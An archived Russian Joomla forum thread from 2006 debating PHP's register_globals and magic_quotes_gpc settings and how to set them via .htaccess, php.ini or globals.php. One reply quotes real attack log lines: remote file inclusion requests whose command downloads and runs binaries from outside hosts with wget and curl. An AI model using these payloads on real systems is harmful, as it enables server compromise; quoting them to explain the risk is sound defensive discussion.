Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 25 Ответов
  • 99173 Просмотров
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Magic Quotes и Register Globals
« : 14.06.2006, 14:15:36 »
Самые частые из возникаемых вопросов - это требования при установке джумлы к:
magic_quotes_gps on
register_globals off

почему?..
для начала приведу выдержку из перевода интервью Расмуса Лердорфа для SitePoint (перевод опубликован на phpclub, полностью можно прочитать здесь)

SP: Какова ваша точка зрения на Magic Quotes* и Register Globals**?

* Опция, включающая автоматическое добавление обратного слеша к кавычкам в данных, приходящих из форм и HTTP-запросов. В SQL-запросах текстовые строки выделяются кавычками. Чтобы вставить строку, содержащую в себе кавычки, их нужно выделить ("эскейпить") обратными слешами ("\"). Это делается либо при помощи функции addslashes, либо автоматически при включенной опции Magic Quotes (прим. переводчика).

** Данные из POST и GET запросов (и аналогично других типов источников) доступны в массивах $HTTP_POST_VARS, $HTTP_GET_VARS. Например, значение поля name из формы будет находиться в $HTTP_POST_VARS["name"]. Опция Register Globals делает данные из этих запросов доступными по "простым" именам переменных. В данном примере — $name (прим. переводчика).

RL: Register Globals — одна из особенностей, которая привела людей в PHP. Простота создания веб-приложений, когда форма и другие переменные были автоматически доступны не может быть побеждена.

Лично я не был за выключение опции Register Globals по умолчанию. Это очень мало увеличивает общую безопасность приложения. Если люди не проверяют данные, приходящие от пользователя, тогда и без, и с включенными Registered Globals это приложение будет небезопасным.

Иметь отключенные Register Globals полезно только в одном случае — когда вы забываете инициализировать переменную до её использования, и кто-то, кто знает ваш код, использует это. Меняя уровень сообщений об ошибках, вы можете дать PHP найти эти случаи автоматически. В итоге, я думаю, всё, что сделало отключение Register Globals — это усложнило написание приложений на PHP.

И ещё это сделало нам 10-20 вопросов/сообщений об ошибках в день от пользователей, которых сбило с толку это изменение.

Magic Quotes появились в те дни, когда PHP использовался в основном исключительно для приложений, работающих на базах данных. Эти программы принимали данные из формы и вставляли их в базу. Даже сегодня куча скриптов на PHP делают чуть больше этого.

Вам всё время нужно эскейпить кавычки перед тем, как вставлять строку в базу данных. Если вы этого не делаете, вы получаете уродскую ошибку SQL, и ваша программа не работает. После объяснения этого простого факта людям в пятидесятый раз на дню я решил, что с меня хватит, и заставил PHP эскейпить строки на лету. Таким образом, программы будут работать, а худшее, что может произойти — это кто-то увидит лишний обратный слеш ("\") на экране, когда они выводят данные напрямую вместо вставки их в базу.

Часто люди даже не замечают лишний \, поскольку это не вызвало фатальных ошибок SQL, и поэтому меня не приводят в замешательство письма с вопросами, что же происходит. Это было очень здорово.

Даже сегодня вы можете увидеть случайный сайт, где, очевидно, автор не осознавал, что данные нужно эскейпить перед вставкой в базу, и вы видите то тут, то там \. Каждый из этих сайтов — это письмо на саппорт, на которое нам не нужно было отвечать.

Информированные люди, которым не нравится эта фича, могут отключить её сами и управляться со всеми кавычками самостоятельно. А информированные, которые хотят писать компактные программы, могут просто проверить настройки, используя get_magic_quotes_gpc() и добавить вызов addslashes(), где нужно.


magic_quotes_gpc и register_globals являются настроечными константами, указывающими РНР, как ему работать (файл php.ini). Иногда некоторые хостеры позволяют выполнять настройку апачи из .htaccess посредством установки флагов или значений через php_flag или php_value, но в последнее время из-за увеличивающегося числа неопытных пользователей, хостеры всё чаще стараются отключать эту возможность. Так что при попытке изменить настройки php через .htaccess вы можете просто сделать свой сайт неработоспособным.
Договаривайтесь с хостерами!

Перейдём к комментариям и начнём с magic_quotes_gpc
Перевести это можно как "волшебные кавычки".
Как для PHP, так и для MySQL кавычки носят смысл не только текста, а ещё и управляющего (объединяющего) символа. И, если внутри одного выражения/текста появится "несанкционированная" кавычка, то это может привести к некорректному завершению выражения и, соответственно, к нарушениям при записи информации в БД.
В связи с ростом числа "любителей" в среде программистов на РНР, забывающих принудительно выполнять соответствующие преобразования с текстом, было решено ввести такую функцию для "забывчивых товарисчей" :)
Естественно, что никто не застрахован от таких "недочётов" в коде, поэтому лучше чтобы эта функция была включена. И это не всегда, а чаще всего, действительно, невозможно сделать через .htaccess, поэтому обращайтесь к своему хостеру.

Теперь про register_globals.
Неоднозначно...
Суть - если эта опция включена, то результат приводит к доступности глобальных переменных, а так же переменных массива передаваемых параметров (через POST/GET) в области видимости любой функции.
Классно? Ага!!!... Да нет, оказалось, что не очень... :(
Наличие потенциального "свободно гуляющего" кода во всей области выполнения программы всё же пугает и потенциально способствует ухудшению безопастности и увеличения вероятности взлома вследствие недосмотра программиста при парсинге передаваемых параметров.
К сожалению, никто так толком и не может доказать плохо это или хорошо...

Что же касается Джумлы, то переменные в массивах POST, GET, REQUEST... эмулируются через _POST, _GET, _REQUEST и т.д., а извлекаемые данные проверяются внутренними средствами. Т.о. програмист не "привязан" к тому, как выставлено register_globals on или off, а получение данных из передаваемых параметров рекомендуется производить через API переменной $mainframe, в частности, через функцию getUserStateFromRequest(...).
Так вы обезопасите свой код от "посягательств" с стороны.
« Последнее редактирование: 13.10.2006, 12:20:39 от Yana »
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

Dead Krolik

  • Захожу иногда
  • 131
  • 33 / 4
  • Теперь я рыбка
Re: Magic Quotes и Register Globals
« Ответ #1 : 29.06.2006, 22:00:51 »
Поздно я заметил топик.

Цитировать
Наличие потенциального "свободно гуляющего" кода во всей области выполнения программы всё же пугает и потенциально способствует ухудшению безопастности и увеличения вероятности взлома в следствие недосмотра программиста при прасинге передаваемых параметров.
К сожалению, никто так толком и не может доказать плохо это или хорошо...
Если ты выражаешь свое мнение, то давай покажи на примерах - где это плохо. То что регистер_глобалс=On - дыра - БРЕД. Хотя бы один пример.

Цитировать
Что же касается Джумлы, то переменные в массивах POST, GET, REQUEST... эмулируются через _POST, _GET, _REQUEST и т.д.
А что такое POST-массив. Есть _POST, а вот про POST не слыхал. Поясни.

Цитировать
Т.о., програмист не "привязан" к тому, как выставлено register_globals on или off, а получение данных из передаваемых параметров рекомендуется производить через API переменной $mainframe, в частности, через функцию getUserStateFromRequest(...).
Понял что написал? Я не привязан в одном случае - если беру данные из _POST а не глобальную юзаю. Проблемы нет. И не надо ее придумывать. Хотя все переменные из этих _POST и _GET до сих пор (!) по-любому экстрактятся в глобальные.
гетЮзерСтейт вообще бредятина, просто тягать из _SESSION (или из _COOKIES, не помню точно) для этого надо заводить такую длинную функцию? Чего проще уж в mosGetParam запихать.
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Magic Quotes и Register Globals
« Ответ #2 : 29.06.2006, 22:31:58 »
То что регистер_глобалс=On - дыра - БРЕД. Хотя бы один пример.
то, что переменные запроса автоматически мапятся на переменные скрипта не есть хорошо, конечно, при корректно написанном скрипте это не помеха, но если речь идет о безопасности в целом, то это нафиг никому не нужная фича.

если просматривать логи дефейсов мамбы, то очень часто встречаешь:

вот простой пример:
/index2.php?option=com_content&do_pdf=1&id=1&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo|
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;

и т.д. 
« Последнее редактирование: 29.06.2006, 22:46:23 от smart »
*

Dead Krolik

  • Захожу иногда
  • 131
  • 33 / 4
  • Теперь я рыбка
Re: Magic Quotes и Register Globals
« Ответ #3 : 30.06.2006, 17:47:46 »
>но если речь идет о безопасности в целом, то это нафиг никому не нужная фича
Если речь идет о криворукости, то фича конечно нафиг. Но еррор_репортинг=E_ALL и все будет хорошо.

Дыра в мамбе - это дыра, причем регистер_глобалс тут ни при чем, тут как раз "при чем" девелоперы которые это эмулируют через одно место. Очень темное и вонючее.
*

era

  • Администратор
  • 1587
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
*

era

  • Администратор
  • 1587
  • 391 / 5
  • В туалете лучше быть пользователем, чем админом.
Re: Magic Quotes и Register Globals
« Ответ #5 : 18.07.2006, 11:32:24 »
Ну чисто теоретически остаётся 3-и возможности:
1. При новых уязвимостях Joomla - обновляться.
2. Внутренние угрозы связаные с Shared хостингом (это когда несколько сайтов на одном сервере).
Н-р: Всё тот же хостер, есть например у тебя всё тот-же сайт vasya.ru по пути /var/www/vasya_ru/htdocs/ (пользователь vasya_ru)
а на этом-же сервере есть другой пользователь petya_ru с сайтом petya.ru по пути /var/www/petya_ru/htdocs/

получается что если у тебя на сервере лежат файлы и директории с правами 777, то пользователь petya_ru чисто теоритечки может эти самые файлы/директории редактировать, т.к. ты дал права "можно всем читать писать исполнять". Тут уж конечно и от хостера зависит многое (он должен правильно расставлять права на директории /var/www/логин_юзера), но и от тебя кое-что тоже зависит.

3. Уязвимости ПО самого сервера - ну тут просто курить, от хостера зависит.

наверное всё, исключая очень внештатных ситуаций, как например утечка всех логинов и паролей клиентов у Валуя толи в прошлом, то-ли в позопрошлом году.
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: Magic Quotes и Register Globals
« Ответ #6 : 24.07.2006, 13:01:44 »
Вот Странник на ру-мамбо написал:
"Последние версии мамбо и джумла абсолютно защищены даже при включенном register globals (в этом случае используется так называемая эмуляция режима register globals = Off). "

где эта эмуляция включается? доступна ли она в админке или нужно прописывать в хатсесе что то (кроме php_value register_globals off)? т.к. php.ini недоступен на хосте
Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Re: Magic Quotes и Register Globals
« Ответ #7 : 24.07.2006, 13:12:14 »
где эта эмуляция включается?
необходимо файл globals.php-off переименовать в globals.php, переписав существующий...
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: Magic Quotes и Register Globals
« Ответ #8 : 24.07.2006, 13:26:04 »
необходимо файл globals.php-off переименовать в globals.php, переписав существующий...

smart, для тех кто в танке (это я :) ) скажи так или нет, у меня сейчас так:
в хатсесе: php_value register_globals 0
в корне (WWW) два файла: globals.php и globals.php-off - то есть я последний переименовываю и заменяю первый - так?
если да то в хатсесе оставить или закоментировать строку: php_value register_globals 0 ?
Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

Dead Krolik

  • Захожу иногда
  • 131
  • 33 / 4
  • Теперь я рыбка
Re: Magic Quotes и Register Globals
« Ответ #9 : 24.07.2006, 13:37:48 »
по-моему php_value register_globals 0 должно хватить
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #10 : 24.07.2006, 13:40:02 »
если register_globals off и работает, то этого достаточно, точнее, второе будет бестолку.

зы. кстати, понятия не имею, можно ли вместо off писать 0...
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

Sedoy

  • Давно я тут
  • 897
  • 87 / 10
  • Интересно,в какой кодировке пишут врачи?
Re: Magic Quotes и Register Globals
« Ответ #11 : 24.07.2006, 13:46:04 »
по-моему php_value register_globals 0 должно хватить

если только так, то как я понимаю - это просто я ставлю его в off, при этом как уже говорилось могут не работать некие расширения, а вопрос касался "эмуляции" которая по видимому дает работать им (расширениям), но при этом register_globals как бы и off - или я что то не довьезжаю? 
Что б правильно задать вопрос - нужно знать на него ответ!
FAQ по Joomla!
Где скачать шаблоны Joomla Статьи и обзоры Желаю Вам здоровья в личной жизни - живите долго и часто :)
*

Versed

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Magic Quotes и Register Globals
« Ответ #12 : 31.08.2006, 19:13:19 »
Ребята, что то блин сложнвато это все. Давайте попорядку. Напишите порядок действий после обновления до 11 версии. При этом ни каких там можно и не можно. Давайте по максимум закроем все :)
Я сделал так 1) переименовал globals.php-off в просто globals.php (старый файл не удалил а просто тоже переименовал)

2) в .htasses прописано вот что
Код
#  php_value register_globals off
#  php_value display_errors 0
#  php_value file_uploads 1
#  php_value magic_quotes_gpc 1
#  php_value magic_quotes_runtime 0
вот что стоит.
После всего в админке всеравно показыват *Joomla! Register Globals Emulation:  ON  * и выделяет красным. Как я понял он не согласен с тем что ON
Правильно ли я сделал? И что  еще нужно OFF сделать ?
« Последнее редактирование: 31.08.2006, 19:16:26 от Versed »
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #13 : 31.08.2006, 19:19:34 »
за "решёткой" - это ремарка == код НЕ выполняется.
и не факт, что твой провайдер позволяет изменять php_value
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

Versed

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Re: Magic Quotes и Register Globals
« Ответ #14 : 31.08.2006, 19:37:22 »
Еще забыл спросить. В обновлении есть файл htasses.txt Походу нужно его переименовать в .htasses  а старый файл  прибить ?   И что значит ремарки и не позволяет изменять?
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #15 : 31.08.2006, 20:46:45 »
Еще забыл спросить. В обновлении есть файл htasses.txt Походу нужно его переименовать в .htasses  а старый файл  прибить ?
очень желательно

И что значит ремарки и не позволяет изменять?
1) значит, что код закомментирован и не будет выполняться
2) значит, что при попытке изменить какое-либо значение через php_value либо ничего не произойдёт, либо увидишь пустой экран.
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Re: Magic Quotes и Register Globals
« Ответ #16 : 08.09.2006, 17:50:18 »
После всего в админке всеравно показыват *Joomla! Register Globals Emulation:  ON  * и выделяет красным. Как я понял он не согласен с тем что ON
Правильно ли я сделал? И что  еще нужно OFF сделать ?

Ставил версию 1.0.11
Как это решил я - в файле globals.php в строчке define( 'RG_EMULATION', 1 ); заменил параметр на ноль.
*

alexshm

  • Новичок
  • 6
  • 2 / 0
Re: Magic Quotes и Register Globals
« Ответ #17 : 13.09.2006, 14:51:45 »
Запутался совсем, читавши это все.

У меня отключился JoomlaBoard после установки php_value register_globals off и define( 'RG_EMULATION', 0);
 
Экспериментальным путем выяснил, что для работы JBoard
достаточно define( 'RG_EMULATION', 1); при php_value register_globals off

Чем такой вариант чреват с точки зрения безопасности?
*

mandalay

  • Осваиваюсь на форуме
  • 46
  • 2 / 0
Re: Magic Quotes и Register Globals
« Ответ #18 : 11.10.2006, 19:18:47 »
Выставляю в .htasses
php_value register_globals off

Сайт вываливаеться в 500-ую ошибку  ????
*

Yana

  • Захожу иногда
  • 66
  • 17 / 0
  • Пенсионерка русской поддержки Joomla
Re: Magic Quotes и Register Globals
« Ответ #19 : 13.10.2006, 12:25:28 »
Для Apache 1.x
php_flag register_globals off

Для Apache 2.x
php_value register_globals 0

http://joomlaportal.ru/content/view/967/68/
*

mandalay

  • Осваиваюсь на форуме
  • 46
  • 2 / 0
Re: Magic Quotes и Register Globals
« Ответ #20 : 13.10.2006, 15:27:57 »
Оба варианта - результат 500  :o
Трясу хостера....
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #21 : 13.10.2006, 15:38:39 »
вообще странно...
ведь по идее, register_globals = off - это в интересах хостера - выше безопастность.
почему они ставят on не понятно.
разве что это дефолтовый php.ini и сам php откомпилирован как cgi...
но в этом случае всё очень просто ;)
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

mandalay

  • Осваиваюсь на форуме
  • 46
  • 2 / 0
Re: Magic Quotes и Register Globals
« Ответ #22 : 13.10.2006, 17:45:43 »
Всё нормально... хостер скинул дефолтовый php.ini, подправил, выложил в корень, Joomla больше ни чего не советует  8)
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #23 : 13.10.2006, 18:09:29 »
Всё нормально... хостер скинул дефолтовый php.ini, подправил, выложил в корень, Joomla больше ни чего не советует  8)
его же скопируй в папку /administrator/
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

mandalay

  • Осваиваюсь на форуме
  • 46
  • 2 / 0
Re: Magic Quotes и Register Globals
« Ответ #24 : 13.10.2006, 19:46:38 »
ОК...
Дело в том, что у меня на аккаунте хостера несколко сайтов...
Структура вроде..
/сайт1/ => www.сайт1.ru
/cайт2/ => www.сайт2.ru
/сайт3/ => www.сайт3.ru
Так вот моя joomla стоит в /сайт1/, если я ложу Php.ini в корень СВОЕГО сайта(/сайт1/), то она ругаеться, мол register_globals не выключен. Я положил его в САМЫЙ КОРЕНЬ (/) вот тут она и замолчала... на сколько я понял теперь php.ini работает на ВСЕ сайты и на полную глубину... Есть ли смысл ложить её в /сайт1/administrator/ ?
Разумееться мне не сложно, просто хотелось разобраться....
*

userxp

  • Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
Re: Magic Quotes и Register Globals
« Ответ #25 : 13.10.2006, 19:57:37 »
то, что об этом говорит админка, вовсе не значит, что это работает для сайта, хотя очень на то похоже.
просто обычно хостер настраивает php.ini по-умолчанию свой.
раз у тебя админка реагирует, то вполне возможно, что настроено так, чтобв дефолтовый php.ini берётся с твоего корня.
в этом случае - всё ок.
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться